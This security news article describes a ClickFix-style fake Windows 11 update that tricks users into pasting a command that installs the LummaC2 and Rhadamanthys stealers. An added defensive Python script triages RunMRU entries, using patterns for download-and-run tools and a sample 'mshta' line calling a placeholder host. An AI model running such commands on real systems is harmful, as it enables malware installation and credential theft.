ClickFix-style fake Windows 11 update installs LummaC2 and Rhadamanthys

Cybersecurity specialists at Huntress have uncovered a new wave of attacks built around a ClickFix-style ploy that presents a malicious process as a mandatory Windows 11 update. Targets are shown a full-screen counterfeit of the Windows Update Center that is almost indistinguishable from the real interface, creating a convincing sense of legitimacy.

People are prompted to update their system, while a command is quietly placed into the clipboard. The ruse then steers the user to press Win + R to open the Run dialog, paste the prepared string, and confirm its execution, so the malicious code is launched by the user's own action. Because it looks like a routine system step, many defenses are sidestepped.
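Because the pasted string is launched through the Run dialog, Windows records it in the user's RunMRU registry key, which gives responders a place to look. The sketch below is an added example, not code from Huntress or from the campaign: it triages an exported RunMRU key, and the heuristic patterns, the two-hit threshold and the sample entries are assumptions, since the article does not name the pasted command.

```python
import re

# Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# Values are named a, b, c, ...; each ends with the marker "\1".
# "MRUList" holds the value names ordered from most to least recent.

# Assumed heuristics for illustration; tune them to your environment.
SUSPICIOUS = {
    "script_host": re.compile(
        r"\b(powershell|pwsh|mshta|wscript|cscript|cmd)(\.exe)?\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "download_and_run": re.compile(
        r"\b(iex|invoke-expression|iwr|invoke-webrequest|curl|certutil)\b", re.I),
}

def runmru_commands(values):
    """Return Run-dialog commands, most recent first."""
    commands = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is None:
            continue  # MRUList can reference a value that was deleted
        commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands

def triage(values, min_hits=2):
    """Flag commands matching at least min_hits heuristic categories."""
    findings = []
    for cmd in runmru_commands(values):
        hits = sorted(k for k, rx in SUSPICIOUS.items() if rx.search(cmd))
        if len(hits) >= min_hits:
            findings.append((cmd, hits))
    return findings

# Constructed sample export (not real telemetry); .invalid never resolves.
SAMPLE = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "mshta https://updates.example.invalid/check\\1",
}

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE):
        print(f"review: {cmd!r} matched {hits}")
```

Requiring two categories keeps a bare `cmd` or `notepad` entry from being flagged while still surfacing a script host paired with a remote URL.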

Once activated, the scheme downloads and installs LummaC2 and Rhadamanthys. These tools specialize in the covert collection of sensitive information, ranging from account credentials and cookies to cryptocurrency wallet data and saved passwords. Researchers say the campaign has been unfolding since early October, but its scale remains unclear, with no victim counts disclosed. The risk is heightened by how authentic the lure appears and by the fact that the user effectively initiates the malicious sequence without suspecting it—precisely the kind of social engineering that proves most effective.